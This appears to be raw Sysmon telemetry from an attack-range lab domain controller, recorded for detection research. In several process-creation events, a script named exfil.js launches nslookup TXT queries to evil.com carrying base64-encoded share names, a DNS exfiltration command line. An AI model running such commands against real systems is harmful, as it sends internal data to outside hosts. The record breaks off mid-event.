10341000x8000000000000000195813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.817{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-703E-000000005F02}2560C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.817{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-703E-000000005F02}2560C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000195811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.817{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE82A3F53A093FBBB585562B8158DE7F,SHA256=A8B0D92357AD10BB787C3D60AB687820B6248640940781B0762B861FB579A400,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.816{2E1864BB-17AC-629A-703E-000000005F02}25604904C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-6F3E-000000005F02}5580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.796{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-703E-000000005F02}2560C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.796{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-6F3E-000000005F02}5580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.796{2E1864BB-17A1-629A-783D-000000005F02}55526036C:\Windows\System32\WScript.exe{2E1864BB-17AC-629A-6F3E-000000005F02}5580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.800{2E1864BB-17AC-629A-6F3E-000000005F02}5580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlomfc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.796{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlquls.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.749{2E1864BB-17AC-629A-6D3E-000000005F02}57087364C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-6E3E-000000005F02}4344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.733{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.733{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.733{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.733{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.733{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-6E3E-000000005F02}4344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.733{2E1864BB-17AC-629A-6C3E-000000005F02}71922556C:\Windows\system32\cmd.exe{2E1864BB-17AC-629A-6E3E-000000005F02}4344C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.742{2E1864BB-17AC-629A-6E3E-000000005F02}4344C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AC-629A-6C3E-000000005F02}7192C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlquls.tmp 2>&1 10341000x8000000000000000195792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.717{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-6D3E-000000005F02}5708C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.717{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-6D3E-000000005F02}5708C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.712{2E1864BB-17AC-629A-6D3E-000000005F02}57087364C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-6C3E-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.681{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-6D3E-000000005F02}5708C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.664{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.664{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.664{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.664{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.664{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-6C3E-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.664{2E1864BB-17A1-629A-783D-000000005F02}55522604C:\Windows\System32\WScript.exe{2E1864BB-17AC-629A-6C3E-000000005F02}7192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.675{2E1864BB-17AC-629A-6C3E-000000005F02}7192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlquls.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 